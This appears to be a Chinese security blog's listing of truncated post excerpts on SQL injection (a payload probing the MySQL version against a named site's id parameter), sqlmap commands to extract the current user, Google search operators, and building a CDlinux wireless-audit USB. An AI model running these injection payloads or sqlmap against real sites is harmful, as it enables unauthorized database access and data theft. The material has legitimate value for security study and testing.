摘要：1.判断版本http://www.qqkiss.tk/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常，说明大于4.0版本，支持ounion查询 2.猜解字段数目,用order by也可以猜，也可以用union 阅读全文

摘要：version()user()database()@@version_compile_os 阅读全文

摘要：inurl: 用于搜索网页上包含的URL. 这个语法对寻找网页上的搜索,帮助之类的很有用. intext: 只搜索网页部分中包含的文字(也就是忽略了标题,URL等的文字). site: 可以限制你搜索范围的域名. filetype: 搜索文件的后缀或者扩展名 intitle: 限制你搜索的网页标题. 阅读全文

摘要：1.老毛桃U盘制作软件（其它u盘制作软件也可以）2. CDlinux（自己找）3. FbinstTool软件 用U盘制作工具制作好启动U盘，解压cdlinux到U盘根目录，用fbinsttool编辑 grldr菜单，在后面加上：title 【10】 启动CDlinux无线安全审计系统find --s 阅读全文

摘要：sqlmap -u "http://url/news?id=1" --level=3 --smart --dbms "Mysql" --current-user #获取当前用户名称 - 专注网络安全- p, Z( Q% {/ o, J% | sqlmap -u "http://www.xxoo.co 阅读全文